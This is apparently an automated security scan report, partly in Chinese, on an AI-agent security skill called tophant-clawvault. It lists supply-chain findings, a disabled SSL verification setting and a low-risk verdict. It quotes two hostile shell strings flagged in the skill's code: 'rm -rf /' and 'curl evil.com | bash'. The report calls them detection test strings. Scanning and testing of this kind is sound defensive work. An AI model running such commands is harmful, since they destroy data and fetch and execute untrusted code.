tophant-clawvault 安全扫描报告 — 低风险 | ClawSafe

25 /100

tophant-clawvault

AI security system protecting agents from prompt injection, data leakage, and dangerous commands via local HTTP proxy

ClawVault is a legitimate AI security tool with good documentation; the flagged IOCs are test strings not executed code, though there are minor supply chain concerns.

技能名称tophant-clawvault

分析耗时40.0s

引擎pi

✓

可以安装

Approve for use with caution: pin ClawVault to specific version before installation to mitigate supply chain risk.

安全发现 3 项

严重性	安全发现	位置
中危	Unpinned package version range 供应链 Install command uses 'clawvault>=0.1.0,<1.0.0' allowing any 0.x.x version including potentially malicious future releases `pinned_version = "clawvault>=0.1.0,<1.0.0"` → Pin to specific version: pip install clawvault==0.1.0 or use hash verification	`clawvault_manager.py:88`
中危	GitHub fallback without integrity verification 供应链 Fallback installation from GitHub tag '@v0.1.0' lacks checksum or hash verification `git+https://github.com/tophant-ai/[email protected]` → Use specific commit hash or package hash verification for GitHub installations	`clawvault_manager.py:98`
低危	SSL verification disabled in default config 敏感访问 Default config sets ssl_verify: False for MITM inspection, documented but risky `"ssl_verify": False` → Ensure tool runs only on trusted networks; document SSL bypass implications	`clawvault_manager.py:154`

资源类型	声明权限	推断权限	状态	证据
命令执行	`WRITE`	`WRITE`	✓ 一致	clawvault_manager.py:88 pip install
文件系统	`WRITE`	`WRITE`	✓ 一致	clawvault_manager.py:137 config write
网络访问	`READ`	`WRITE`	✓ 一致	SECURITY.md documents MITM proxy
文件系统	`READ`	`READ`	✓ 一致	~/.ClawVault/config.yaml only

2 严重 5 项发现

💀

严重危险命令危险 Shell 命令

rm -rf /

clawvault_manager.py:401

💀

严重危险命令危险 Shell 命令

curl evil.com | bash

clawvault_manager.py:402

🔗

中危外部 URL 外部 URL

http://127.0.0.1:8766

SECURITY.md:51

🔗

中危外部 URL 外部 URL

https://docs.openclaw.ai/gateway/security

SECURITY.md:256

📧

提示邮箱邮箱地址

[email protected]

SECURITY.md:242

目录结构

5 文件 · 37.6 KB · 1120 行

Python 1f · 581L Markdown 3f · 493L JSON 1f · 46L

├─ 🐍 clawvault_manager.py Python 581L · 21.4 KB

├─ 📝 README.md Markdown 79L · 2.2 KB

├─ 📝 SECURITY.md Markdown 262L · 8.7 KB

├─ 📋 skill.json JSON 46L · 1.9 KB

└─ 📝 SKILL.md Markdown 152L · 3.5 KB

依赖分析 3 项

包名	版本	来源	已知漏洞	备注
`pyyaml`	`*`	pip	否	Not explicitly pinned in skill
`requests`	`*`	pip	否	Not explicitly pinned in skill
`clawvault`	`>=0.1.0,<1.0.0`	pypi/github	否	Version range unpinned - supply chain risk

安全亮点

✓ Comprehensive documentation including SECURITY.md with threat model

✓ Test IOCs (rm -rf, curl|bash) are test strings not executed code - legitimate detection testing

✓ All network calls are to localhost for proxy operations

✓ No credential harvesting or exfiltration detected

✓ No obfuscation or base64 execution observed

✓ Skill behavior matches documentation (MITM proxy for AI security)